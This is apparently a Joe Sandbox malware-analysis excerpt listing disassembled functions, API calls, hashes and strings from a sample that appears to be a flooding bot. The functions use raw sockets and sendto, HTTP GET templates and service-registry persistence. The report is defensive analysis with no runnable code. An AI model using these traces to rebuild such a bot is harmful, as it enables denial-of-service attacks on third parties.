                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$#540#800#860#941FileFindLibraryLoad_mbscmp$#940AttributesCloseDirectoryH_prologNextRemove_mbsicmp
                                                                    • String ID: A$F$F$F$KERNEL32.dll$LoadLibraryA$SetFileAttributesA$\*.*$d$desktop.ini$e$i$i$i$index.dat$l$n$r$s$t
                                                                    • API String ID: 872879381-4179677004
                                                                    • Opcode ID: 0f35c9e2666ea853d80432bf8a4c6b15b8ba5baff7b9932b491024ab045edd1b
                                                                    • Instruction ID: 550540678717dc9560bb5a6443bf438c6421b050beaa66f5a9c96ae308b9795e
                                                                    • Opcode Fuzzy Hash: 0f35c9e2666ea853d80432bf8a4c6b15b8ba5baff7b9932b491024ab045edd1b
                                                                    • Instruction Fuzzy Hash: 3A517A3180429EEAEF01DBA4CC49BEFBFB4FF19394F144069E254B20A5DB759A44CB61
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?,?), ref: 00412543
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041254A
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000128), ref: 0041255E
                                                                    • _strcmpi.MSVCRT ref: 0041257D
                                                                    • lstrcmpiA.KERNEL32(00000024,0041023E), ref: 004125A0
                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 004125A9
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004125B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??2@??3@AddressCloseHandleLibraryLoadProc_strcmpilstrcmpi
                                                                    • String ID: .$2$2$3$3$C$E$E$K$L$N$R$S$T$a$a$d$e$e$e$h$h$l$l$l$l$n$o$o$o$p$p$r$s$t$t
                                                                    • API String ID: 4033398891-172469957
                                                                    • Opcode ID: a85d4da7e25bfc021008fdb4eb895b0e9db7dcc5a7775750773341ec229fc6c2
                                                                    • Instruction ID: 6612384d74de1075318b009a634c612a85a63009bb421a5cb98037d6a9ebd229
                                                                    • Opcode Fuzzy Hash: a85d4da7e25bfc021008fdb4eb895b0e9db7dcc5a7775750773341ec229fc6c2
                                                                    • Instruction Fuzzy Hash: E0412520C082C9EDFB0297E8C9487DEBFB55F26748F084099D18476282C7FE5658C7BA
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$strcspnstrstr$strcpy$CountExitThreadTickinet_addrstrncpy$CleanupSleepSocketclosesocketgethostbynamememcpyrandsendtosetsockoptsrandstrlentime
                                                                    • String ID: http://
                                                                    • API String ID: 979503427-1121587658
                                                                    • Opcode ID: 6771483aa2a22676fd8939427ac368e0207a9097a12a7897363da1047b258fd2
                                                                    • Instruction ID: bb97d4083fff4617a1cfe2956ce7e6f398109422fa3043ddc87db9e501804352
                                                                    • Opcode Fuzzy Hash: 6771483aa2a22676fd8939427ac368e0207a9097a12a7897363da1047b258fd2
                                                                    • Instruction Fuzzy Hash: 55818FB2900358AAEB10DBF4CC89FDF7BBCEF05390F014565F215E6195EB74AA448BA4
                                                                    APIs
                                                                    • memset.MSVCRT ref: 1000532F
                                                                    • wsprintfA.USER32 ref: 100053D6
                                                                    • lstrlenA.KERNEL32(\Services\%s,00000000), ref: 100053E4
                                                                      • Part of subcall function 1000A87A: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,75A78400,00000000,?,1000AF24,1000D480,000000FF,\Services\%s,10005404,80000002,?,00000072,00000001,00000065,00000000), ref: 1000A8A7
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000A8BE
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000A8C9
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000A8D4
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000A8DF
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000A8EA
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000A8F5
                                                                      • Part of subcall function 1000A87A: FreeLibrary.KERNEL32(00000000), ref: 1000A9E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoadlstrlenmemsetwsprintf
                                                                    • String ID: %$C$C$E$M$Rsjshd fzfgkqcm$S$S$S$S$T$Y$\$\$\$\Services\%s$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 1858923263-2861751080
                                                                    • Opcode ID: 59d64f1269ff033f8419e97669b2c6b3e058a6ae54e3d9c5fea5dff478d7e752
                                                                    • Instruction ID: e9fdd2095035c720c5a7786ee72f50f20d77f3a9c16efb1193372417d4f12b2d
                                                                    • Opcode Fuzzy Hash: 59d64f1269ff033f8419e97669b2c6b3e058a6ae54e3d9c5fea5dff478d7e752
                                                                    • Instruction Fuzzy Hash: 5D31DA50D0C6C9D9EB02C7A8C8097DEBFA51B26349F0840D8D6847A292C6FE575887BA
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F1A3
                                                                    • memset.MSVCRT ref: 0040F1B5
                                                                    • wsprintfA.USER32 ref: 0040F25B
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 0041264D
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 00412660
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 0041266E
                                                                      • Part of subcall function 00412618: LoadLibraryA.KERNEL32(100140CC,?,?,?,?,?,?,?,00000104,00000000), ref: 0041267B
                                                                      • Part of subcall function 00412618: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,00000104,00000000), ref: 00412858
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Library$FreeLoadwsprintf
                                                                    • String ID: %$C$C$E$M$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lSet\Services\%s$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 1820531215-2611586849
                                                                    • Opcode ID: f7094cac4459adb47107945dab151c7785a12311e7f4c75fa1a92ff57b41686b
                                                                    • Instruction ID: 820ff17e154aa7353c7154c80da0717e4b4a1eb9e33995a3da7275733696eb19
                                                                    • Opcode Fuzzy Hash: f7094cac4459adb47107945dab151c7785a12311e7f4c75fa1a92ff57b41686b
                                                                    • Instruction Fuzzy Hash: 7E41EF50D0C2CDDDEF02C6A8C8487DFBFB55B26348F084098D5847A292C6FE575887BA
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D37B
                                                                    • wsprintfA.USER32 ref: 0040D422
                                                                    • lstrlen.KERNEL32(\Services\%s,00000000), ref: 0040D430
                                                                      • Part of subcall function 004128C6: LoadLibraryA.KERNEL32(100140CC,?,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C,00000000), ref: 004128F3
                                                                      • Part of subcall function 004128C6: FreeLibrary.KERNEL32(00000000,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C), ref: 00412A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$FreeLoadlstrlenmemsetwsprintf
                                                                    • String ID: %$C$C$E$M$S$S$S$S$T$Y$\$\$\$\Services\%s$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 273645122-2457757079
                                                                    • Opcode ID: 64733268a9aa450cb2fa780a92f064448cb59fc30580c11a9e199b9d9f75375d
                                                                    • Instruction ID: 62eca78133c1883f9e08b3a7bda7fefc2968bed0c4886193ea0370aea237ef26
                                                                    • Opcode Fuzzy Hash: 64733268a9aa450cb2fa780a92f064448cb59fc30580c11a9e199b9d9f75375d
                                                                    • Instruction Fuzzy Hash: A931FB50D0C2C9D9EF02C7A8C8097DEBFB51B26348F0840D8D6847A292C6FE1758C7BA
                                                                    APIs
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 10002685
                                                                    • htons.WS2_32(00000000), ref: 100026AF
                                                                    • htons.WS2_32(00000028), ref: 100026CD
                                                                    • inet_addr.WS2_32(192.168.1.224), ref: 100026F9
                                                                    • htons.WS2_32(00000001), ref: 1000271A
                                                                    • htons.WS2_32(00000000), ref: 10002727
                                                                    • htonl.WS2_32(00000001), ref: 1000273A
                                                                    • htons.WS2_32(00000200), ref: 10002753
                                                                    • htons.WS2_32(00000014), ref: 10002778
                                                                    • memcpy.MSVCRT(?,?,0000000C), ref: 1000278B
                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,0000000C), ref: 1000279C
                                                                    • memcpy.MSVCRT(?,00000045,00000014,?,00000020,?,?,00000014,?,?,0000000C), ref: 100027BF
                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000045,00000014,?,00000020,?,?,00000014,?,?,0000000C), ref: 100027D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htons$memcpy$Sockethtonlinet_addr
                                                                    • String ID: %d.%d.%d.%d$192.168.1.224$@$E$P
                                                                    • API String ID: 4280156080-1512540977
                                                                    • Opcode ID: f73d76f2467474086f1ba319fdc00ea64aca86d25c9cdc86e77b9bf6975f7c81
                                                                    • Instruction ID: fda62a3156527176196f5142d78b8dfa77923282fcc354d3671f0296b9bdcde9
                                                                    • Opcode Fuzzy Hash: f73d76f2467474086f1ba319fdc00ea64aca86d25c9cdc86e77b9bf6975f7c81
                                                                    • Instruction Fuzzy Hash: 47A13B75C0039CA9EB11DBE4CC85FEEBBBCEF09341F04019AF244A7192DA749689CB65
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strcspn$memset$strcpystrstr$strncpy$strlen$ExitSleepThreadatoi
                                                                    • String ID: Cache-Control: no-cacheReferer: www.qq.com$GET$^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
                                                                    • API String ID: 2471742281-1551478559
                                                                    • Opcode ID: 6f16d937d8421a00feec8bd5e4de45597d4c4ce3044162af3a0f2bae40fdecd5
                                                                    • Instruction ID: 886b51c6d7eadd8a53a5013fe9909734b28e4b463afbf797bc9d912e0c646e36
                                                                    • Opcode Fuzzy Hash: 6f16d937d8421a00feec8bd5e4de45597d4c4ce3044162af3a0f2bae40fdecd5
                                                                    • Instruction Fuzzy Hash: B3613EA1C043DDAAEB01D7E4CC89FDFBFBC9F16284F044095E644B6182D6B99648C7B6
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10003487
                                                                    • socket.WS2_32(00000002,00000003,000000FF), ref: 100034C3
                                                                    • setsockopt.WS2_32(00000000,00000000,00000002,00000001,00000004), ref: 100034D7
                                                                      • Part of subcall function 1000212F: inet_addr.WS2_32(?), ref: 10002133
                                                                      • Part of subcall function 1000212F: gethostbyname.WS2_32(?), ref: 10002141
                                                                    • htons.WS2_32(00000035), ref: 100034F9
                                                                    • rand.MSVCRT ref: 10003536
                                                                    • inet_addr.WS2_32(10014F04), ref: 1000356B
                                                                    • htons.WS2_32(00000035), ref: 10003579
                                                                    • rand.MSVCRT ref: 10003582
                                                                    • htons.WS2_32 ref: 10003593
                                                                    • htons.WS2_32(0000001F), ref: 1000359E
                                                                    • rand.MSVCRT ref: 100035AE
                                                                    • htons.WS2_32(00000001), ref: 100035D5
                                                                    • htons.WS2_32(00000000), ref: 100035EE
                                                                    • htons.WS2_32(00000000), ref: 10003608
                                                                    • htons.WS2_32(00000000), ref: 10003621
                                                                    • memset.MSVCRT ref: 1000364B
                                                                    • strcpy.MSVCRT(?,10014E04), ref: 100036AC
                                                                    • rand.MSVCRT ref: 100036C0
                                                                    • memcpy.MSVCRT(00000000,?,00000008), ref: 100036F7
                                                                    • memcpy.MSVCRT(?,00000011,00000001,00000000,?,00000008), ref: 1000370C
                                                                    • memcpy.MSVCRT(?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 10003721
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 10003736
                                                                    • memcpy.MSVCRT(?,?,0000000C,?,?,00000008,?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 1000374B
                                                                    • memcpy.MSVCRT(?,?,0000000B,?,?,0000000C,?,?,00000008,?,?,00000002,?,00000011,00000001,00000000), ref: 10003760
                                                                    • sendto.WS2_32(?,00000045,00000033,00000000,00000002,00000010), ref: 10003793
                                                                    • WSACleanup.WS2_32 ref: 100037CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htons$memcpy$rand$inet_addr$CleanupStartupgethostbynamememsetsendtosetsockoptsocketstrcpy
                                                                    • String ID: E$aaa${${
                                                                    • API String ID: 3380264282-79695315
                                                                    • Opcode ID: 3a5bf0efb1998e46a54aa8892ca0db1b78663d497b47e77fa9f02356ba356967
                                                                    • Instruction ID: 3705f2aac0dc7ded128acd85163ab38f80b3bf875dc5d5d9896e66c0564205b1
                                                                    • Opcode Fuzzy Hash: 3a5bf0efb1998e46a54aa8892ca0db1b78663d497b47e77fa9f02356ba356967
                                                                    • Instruction Fuzzy Hash: C9914071D14368AAEF21CBB4CC45FDEBBB8AF05300F0484D6E249A6192DBB55B84CF61
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$ExitThreadUserstrncpy$CleanupSleepSocketclosesocketgethostbynamememcpyrandsendtosetsockoptsrandstrlenstrstrtime
                                                                    • String ID: http://
                                                                    • API String ID: 99230694-1121587658
                                                                    • Opcode ID: 6f08066a39faa183714178eb927445c0f8c1f0be96c961269241d03cbda20d64
                                                                    • Instruction ID: 2044131f88c9238eb73b88f870550bdce83bb2a39fa081e258197b3f2e9db646
                                                                    • Opcode Fuzzy Hash: 6f08066a39faa183714178eb927445c0f8c1f0be96c961269241d03cbda20d64
                                                                    • Instruction Fuzzy Hash: A9816CB290031CAAEB10EBF5CC89FDF7B7CEF44354F044566F605E6191EA789A448BA4
                                                                    APIs
                                                                    Strings
                                                                    • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 10003256
                                                                    • http://, xrefs: 100030F7, 100030FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memsetstrcpystrlen$Sleepclosesocketsetsockoptstrcspnstrstr$ExitThreadconnecthtonssendsocketsprintfstrncpywsprintf
                                                                    • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
                                                                    • API String ID: 1052480293-1933603558
                                                                    • Opcode ID: bf6e5e5b11f7a8937f8de9ef89a66f3d51f7ba6284c0d59cee2a1cb77691194b
                                                                    • Instruction ID: c7d53bc35237e9a11db793b75779e2e7d5d22352c15b05034759753c3bbfd9b0
                                                                    • Opcode Fuzzy Hash: bf6e5e5b11f7a8937f8de9ef89a66f3d51f7ba6284c0d59cee2a1cb77691194b
                                                                    • Instruction Fuzzy Hash: 7181917281026CAAEB11DBA4CC89FDE7BBCEF09350F1441A5E604B7190DB74AB54CBA1
                                                                    APIs
                                                                    • strcpy.MSVCRT(?,10014E04), ref: 10003959
                                                                    • strstr.MSVCRT ref: 1000396F
                                                                    • strlen.MSVCRT ref: 1000397C
                                                                    • strstr.MSVCRT ref: 10003995
                                                                    • memset.MSVCRT ref: 100039AA
                                                                    • strcspn.MSVCRT ref: 100039B9
                                                                    • strncpy.MSVCRT ref: 100039C6
                                                                    • strcspn.MSVCRT ref: 100039D0
                                                                    • memset.MSVCRT ref: 100039E4
                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000104), ref: 100039F1
                                                                    • strlen.MSVCRT ref: 10003A00
                                                                    • strcpy.MSVCRT(?,10012118), ref: 10003A13
                                                                    • wsprintfA.USER32 ref: 10003A7B
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10003AAF
                                                                    • Sleep.KERNEL32(00001388), ref: 10003AC4
                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 10003ACA
                                                                      • Part of subcall function 10002080: GetTickCount.KERNEL32 ref: 10002081
                                                                      • Part of subcall function 10002080: rand.MSVCRT ref: 10002089
                                                                    • wsprintfA.USER32 ref: 10003B0B
                                                                    • wsprintfA.USER32 ref: 10003B48
                                                                    • strlen.MSVCRT ref: 10003B7B
                                                                    • send.WS2_32(00000000,?,00000001,00000000), ref: 10003B8B
                                                                    • closesocket.WS2_32(00000000), ref: 10003B92
                                                                    • Sleep.KERNEL32(0000000A), ref: 10003B9A
                                                                    • ExitThread.KERNEL32 ref: 10003B9F
                                                                    Strings
                                                                    • %s %s%s, xrefs: 10003A75
                                                                    • D, xrefs: 10003A85
                                                                    • http://, xrefs: 10003964, 10003967
                                                                    • GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 10003B05
                                                                    • GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 10003B42
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strcpystrlenwsprintf$ProcessSleepmemsetstrcspnstrstr$CountCreateExitTerminateThreadTickclosesocketrandsendstrncpy
                                                                    • String ID: %s %s%s$D$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$http://
                                                                    • API String ID: 675928131-2421092169
                                                                    • Opcode ID: c2b2d54bfc92f34b1d5310e1ae728e4fd3ae6e6a6ae19f68ce4ecff665545261
                                                                    • Instruction ID: 0fa591f0899bc5e60e7e3668aed8b978983f2c5eec8d931ec7377a602ce2b28a
                                                                    • Opcode Fuzzy Hash: c2b2d54bfc92f34b1d5310e1ae728e4fd3ae6e6a6ae19f68ce4ecff665545261
                                                                    • Instruction Fuzzy Hash: 1181617290029CBEEB11D7A4CC45EDFBBBDEB05340F1001E6E609E7151DE75AB888B61
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10003C34
                                                                    • gethostname.WS2_32(?,00000104), ref: 10003C4B
                                                                    • gethostbyname.WS2_32(?), ref: 10003C58
                                                                    • memset.MSVCRT ref: 10003C7B
                                                                    • htons.WS2_32(0000041C), ref: 10003C95
                                                                    • inet_addr.WS2_32(10014E04), ref: 10003CB4
                                                                    • htons.WS2_32(00001544), ref: 10003CC2
                                                                    • htons.WS2_32(00000000), ref: 10003CCF
                                                                    • htons.WS2_32(00000408), ref: 10003CDA
                                                                    • memset.MSVCRT ref: 10003CF7
                                                                    • memcpy.MSVCRT(?,?,00000004,?,00000000,0000043C), ref: 10003D0D
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 10003D1F
                                                                    • memcpy.MSVCRT(?,00000011,00000001,?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 10003D31
                                                                    • memcpy.MSVCRT(?,?,00000002,?,00000011,00000001,?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 10003D43
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000002,?,00000011,00000001,?,?,00000004,?,?,00000004,?), ref: 10003D55
                                                                    • memcpy.MSVCRT(?,?,00000400), ref: 10003D6C
                                                                    • memcpy.MSVCRT(?,00000045,00000014,?,00000414,?,?,00000400), ref: 10003D93
